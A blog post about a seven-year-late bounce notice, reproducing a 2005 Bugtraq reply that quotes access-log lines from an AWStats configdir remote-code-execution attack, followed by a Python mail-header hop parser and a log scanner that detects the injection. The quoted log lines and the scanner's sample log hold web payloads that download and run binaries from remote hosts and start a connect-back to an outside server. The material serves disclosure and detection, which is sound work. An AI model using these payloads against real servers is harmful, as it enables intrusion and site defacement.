
Delivery failure notice for a 7 year old message

Posted: Mon, 26 Mar 2012 16:26:01 +0300 (Updated: Thu, 09 Jan 2020 19:33:27 +0200)
Author: Делян Кръстев

Yesterday I received a delivery failure notice for a message that I sent over 7 years ago!

Here is the message in its entirety:


Return-Path: <>
Delivered-To: krustev.net-krustev@krustev.net
Received: (qmail 18822 invoked from network); 24 Mar 2012 23:40:23 -0000
Received: from osaka.tehbass.nl (HELO osaka.tehbass.nl) (141.105.120.64)
    by home.krustev.net (qpsmtpd/0.84) with ESMTP; Sun, 25 Mar 2012 01:40:23 +0200
X-Bad-Reverse-DNS: no (dnsname - 'osaka.tehbass.nl', dnsip - '141.105.120.64')
Received: by osaka.tehbass.nl (Postfix)
    id 27D574C6C9; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
From: MAILER-DAEMON@osaka.tehbass.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: krustev@krustev.net
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report;
  report-type=delivery-status;
  boundary="1A3704C621.1332632452/osaka.tehbass.nl"
Content-Transfer-Encoding: 8bit
Message-Id: <20120324234052.27D574C6C9@osaka.tehbass.nl>
X-Length: 6718
X-UID: 5914

This is a MIME-encapsulated message.

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii

This is the mail system at host osaka.tehbass.nl.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<sjm@localhost.tehbass.nl> (expanded from <sjm@localhost>): cannot update
    mailbox /var/spool/mail/sjm for user sjm. error writing message: File too
    large

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; osaka.tehbass.nl
X-Postfix-Queue-ID: 1A3704C621
X-Postfix-Sender: rfc822; krustev@krustev.net
Arrival-Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)

Final-Recipient: rfc822; sjm@localhost.tehbass.nl
Original-Recipient: rfc822;sjm@localhost
Action: failed
Status: 5.2.2
Diagnostic-Code: x-unix; input/output error

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Return-Path: <krustev@krustev.net>
Received: from osaka.tehbass.nl (localhost [127.0.0.1])
    by osaka.tehbass.nl (Postfix) with ESMTP id 1A3704C621
    for <sjm@localhost>; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Delivered-To: sjtmulder1981@gmail.com
Received: from gmail-pop.l.google.com [74.125.79.108]
    by osaka.tehbass.nl with POP3 (fetchmail-6.3.21)
    for <sjm@localhost> (single-drop); Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: by 10.216.80.104 with SMTP id j82cs110797wee;
        Mon, 3 May 2010 01:21:44 -0700 (PDT)
Received: by 10.216.173.69 with SMTP id u47mr5747536wel.227.1272874451923;
        Mon, 03 May 2010 01:14:11 -0700 (PDT)
Received-SPF: neutral (google.com: 213.19.161.176 is neither permitted nor denied by best guess record for domain of pop.vevida.com) client-ip=213.19.161.176;
Received: by 10.241.241.82 with POP3 id 18mf39140wwb.56;
        Mon, 03 May 2010 01:14:11 -0700 (PDT)
X-Gmail-Fetch-Info: groen@nl-crew.com 1 pop.gmail.com 995 groen@nl-crew.com
Received: from localhost (localhost.localdomain [127.0.0.1])
    by lisa2xl.intranet.mens.nl.nu (8.12.11/8.12.11) with ESMTP id j0RLUcXT009387
    for <bas@localhost>; Thu, 27 Jan 2005 21:31:14 GMT
Delivered-To: postmaster@aspprojects.nl
Received: from pop.vevida.com [213.19.161.176]
    by localhost with POP3 (fetchmail-6.2.5)
    for bas@localhost (single-drop); Thu, 27 Jan 2005 21:31:14 +0000 (GMT)
Received: (qmail 32077 invoked by uid 89); 27 Jan 2005 00:46:25 -0000
Delivered-To: aspprojects.nl-sjt@aspprojects.nl
Received: (qmail 32072 invoked by uid 0); 27 Jan 2005 00:46:25 -0000
Received: from frost.nl-crew.com (84.244.131.214)
  by net3-nl-mail-04.ad.vevida.net with SMTP; 27 Jan 2005 00:46:25 -0000
Received: from [205.206.231.27] (outgoing.securityfocus.com [205.206.231.27])
    by frost.nl-crew.com (Postfix) with ESMTP id 5AB8468492
    for <bugtrack@mrgreen.eu.org>; Thu, 27 Jan 2005 01:45:28 +0000 (GMT)
Received: from no.name.available by [205.206.231.27]
          via smtpd (for [84.244.131.214] [84.244.131.214]) with ESMTP; Wed, 26 Jan 2005 16:46:24 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
    by outgoing3.securityfocus.com (Postfix) with QMQP
    id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3685 invoked from network); 26 Jan 2005 12:59:54 -0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Delian Krustev <krustev@krustev.net>
To: bugtraq@securityfocus.com,
 full-disclosure@lists.netsys.com,
 security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
User-Agent: KMail/1.4.3
References: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
MIME-Version: 1.0
Message-Id: <200501262031.51944.krustev@krustev.net>
X-Spam-Status: No, hits=0.0 required=5.0, tests=none, version=3.0.2
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by lisa2xl.intranet.mens.nl.nu id j0RLUcXT009387
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 3728

There's an exploit in the wild. Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.



--1A3704C621.1332632452/osaka.tehbass.nl--
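The interesting part of the bounce is the Received: chain of the returned message: it was posted to Bugtraq in January 2005, fetched into a local mailbox by fetchmail the next day, surfaced in a Gmail account in May 2010, and was finally pulled down by another fetchmail in March 2012 into a mailbox that was full. The following Python script is an added example, not part of the post; it feeds a subset of those headers (copied from the bounce above and embedded as a constructed string) through the standard library's header parser, orders the hops oldest first, and reports the delay at each hop, which is the check you want when a message arrives with an implausible date.

```python
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed excerpt: a subset of the Received: lines from the bounced
# message above, in the order they appear (newest hop first), followed by
# the blank line that terminates a header block.
RAW_HEADERS = """\
Received: from osaka.tehbass.nl (localhost [127.0.0.1])
    by osaka.tehbass.nl (Postfix) with ESMTP id 1A3704C621
    for <sjm@localhost>; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: from gmail-pop.l.google.com [74.125.79.108]
    by osaka.tehbass.nl with POP3 (fetchmail-6.3.21)
    for <sjm@localhost> (single-drop); Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: by 10.216.80.104 with SMTP id j82cs110797wee;
        Mon, 3 May 2010 01:21:44 -0700 (PDT)
Received: from localhost (localhost.localdomain [127.0.0.1])
    by lisa2xl.intranet.mens.nl.nu (8.12.11/8.12.11) with ESMTP id j0RLUcXT009387
    for <bas@localhost>; Thu, 27 Jan 2005 21:31:14 GMT
Received: from pop.vevida.com [213.19.161.176]
    by localhost with POP3 (fetchmail-6.2.5)
    for bas@localhost (single-drop); Thu, 27 Jan 2005 21:31:14 +0000 (GMT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
    by outgoing3.securityfocus.com (Postfix) with QMQP
    id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution

"""

# The host that accepted the message at this hop follows the word "by".
BY_HOST = re.compile(r"\bby\s+(\S+)")


def received_hops(raw_headers):
    """Return [(receiving_host, timezone-aware datetime), ...], oldest hop first."""
    msg = message_from_string(raw_headers)
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())            # unfold continuation lines
        clause, _, stamp = flat.rpartition(";")   # the timestamp follows the last ';'
        host = BY_HOST.search(clause)
        hops.append((host.group(1) if host else "?",
                     parsedate_to_datetime(stamp.strip())))
    hops.reverse()   # each MTA prepends its header, so the bottom one is the oldest
    return hops


def hop_delays_days(hops):
    """Delay, in days, between each pair of consecutive hops."""
    return [(later[1] - earlier[1]).total_seconds() / 86400
            for earlier, later in zip(hops, hops[1:])]


def longest_gap(hops):
    """(host_before, host_after, days) for the hop that held the message longest."""
    delays = hop_delays_days(hops)
    i = max(range(len(delays)), key=delays.__getitem__)
    return hops[i][0], hops[i + 1][0], delays[i]


def total_transit_days(hops):
    """Whole days between the oldest and the newest hop."""
    return (hops[-1][1] - hops[0][1]).days


if __name__ == "__main__":
    hops = received_hops(RAW_HEADERS)
    print(f"{hops[0][1]:%Y-%m-%d %H:%M %z}               {hops[0][0]}")
    for (host, when), delay in zip(hops[1:], hop_delays_days(hops)):
        print(f"{when:%Y-%m-%d %H:%M %z}  +{delay:7.1f} d  {host}")
    print("total transit: %d days" % total_transit_days(hops))
```

Run on the excerpt, the script attributes almost all of the seven years to two hops: the 2005 mailbox that was only picked up by Gmail's POP fetcher in 2010, and the Gmail account that was only drained by fetchmail in 2012. Whitespace folding and the parenthesised zone names are handled by the standard library, so the same code works on any message exported with its headers intact.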
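The two access-log entries quoted in the 2005 message are the classic shape of the AWStats configdir injection: a configdir parameter whose value starts with a pipe and carries a shell command. The Python below is an added detection example, not code from the post or from the advisory thread; it parses combined-format log lines, flags awstats.pl requests whose decoded configdir value contains shell metacharacters, and extracts the command for the incident record. The sample log is constructed with documentation addresses and a placeholder payload host (attacker.example) in place of the real ones.

```python
import re
from urllib.parse import unquote

# Apache/nginx combined log format: client, ident, user, [time], "request", status, bytes.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# A configdir value should be a directory path; pipes, command separators,
# backticks, subshell markers and NUL bytes do not belong in one.
SHELL_META = re.compile(r'[|;`$]|\x00')

# Constructed sample log: two benign AWStats requests, two requests shaped like
# the entries quoted above (placeholder hosts), and one unrelated request.
SAMPLE_LOG = """\
198.51.100.4 - - [26/Jan/2005:06:30:12 +0000] "GET /cgi-bin/awstats/awstats.pl?config=www.example.org&output=main HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Jan/2005:06:30:40 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=/etc/awstats&config=www.example.org HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://attacker.example/cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.7 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://attacker.example/dc;chmod%20777%20dc;./dc%20c2.example%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.9 - - [26/Jan/2005:06:35:01 +0000] "GET /index.html?q=a|b HTTP/1.1" 200 1200 "-" "curl/7.10"
"""


def configdir_value(url):
    """Decoded configdir parameter of an awstats.pl request, or None."""
    path, _, query = url.partition("?")
    if not path.lower().endswith("/awstats.pl"):
        return None
    for param in query.split("&"):
        name, _, value = param.partition("=")
        if name.lower() == "configdir":
            return unquote(value)          # %20 -> space, %00 -> NUL
    return None


def is_configdir_injection(url):
    """True when an awstats.pl request carries shell metacharacters in configdir."""
    value = configdir_value(url)
    return value is not None and SHELL_META.search(value) is not None


def scan_log(text):
    """One record per suspicious request: client, time, HTTP status, decoded command."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not is_configdir_injection(m["url"]):
            continue
        # Strip the leading pipe and the trailing NUL that ends the injected value.
        command = configdir_value(m["url"]).lstrip("|").rstrip("\x00")
        hits.append({"client": m["client"], "time": m["time"],
                     "status": m["status"], "command": command})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']}  {hit['client']}  HTTP {hit['status']}  {hit['command']}")
```

The HTTP status is kept in the record on purpose: the quoted entries show the server answering 200, which is consistent with the CGI having run the injected command rather than rejecting the request. Pair a hit like that with the host-side evidence the post mentions, a new listening socket and a replaced index page, and you have the timeline for the incident record.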

Posted in dir: /blog/
Tags: email

